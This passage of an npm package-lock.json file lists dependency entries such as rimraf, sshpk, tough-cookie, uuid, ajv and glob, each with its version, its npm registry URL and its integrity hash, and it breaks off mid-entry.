}, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", 